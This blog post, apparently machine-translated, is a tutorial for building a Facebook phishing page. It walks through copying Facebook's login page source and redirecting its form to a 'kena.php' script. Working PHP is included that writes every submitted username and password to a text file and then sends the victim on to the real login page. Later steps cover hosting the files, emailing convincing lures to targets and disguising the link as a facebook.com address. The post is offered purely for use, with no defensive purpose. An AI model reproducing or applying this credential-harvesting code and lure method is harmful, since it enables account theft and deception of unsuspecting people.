Sunday

How to Make Phising Facebook



Not need to say much. Just follow the following tutors wrote

1. Sign-open firefox facebook (of course)

2. Click view - page source (or press Ctrl + U)

3. Copy his code into notepad

4. Find the word 'action'. The way the Ctrl + F type in action on the box that appears and press enter
5. Replace the word POST to GET there. And the web address after the action becomes kena.php
6. Save with the name of index.php. extension must be remembered. php. Do not forget to save as type
All files replaced
7. Create a new document in notepad. Then paste the code below


<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Look at the third line, there is a code password.txt. later the results of our password phishing will
put there.

Save as above with the name of the php code kena.php
8. Create a new notepad document, leave it blank and save with the name password.txt.
9. Upload the three files above (index.php, kena.php, and password.txt) to your hosting
all. The trick
search on google. Be our phishing site

10. The final way. Let me look convincing for emails like this. Send email to
people who want to know the password
11. Remember, we http://www.facebook.com/n/?reqs.php make hyperlinks to address phishing sites.


How to Make Phising Facebook Rating: 4.5 Diposkan Oleh: Unknown

0 komentar:

Post a Comment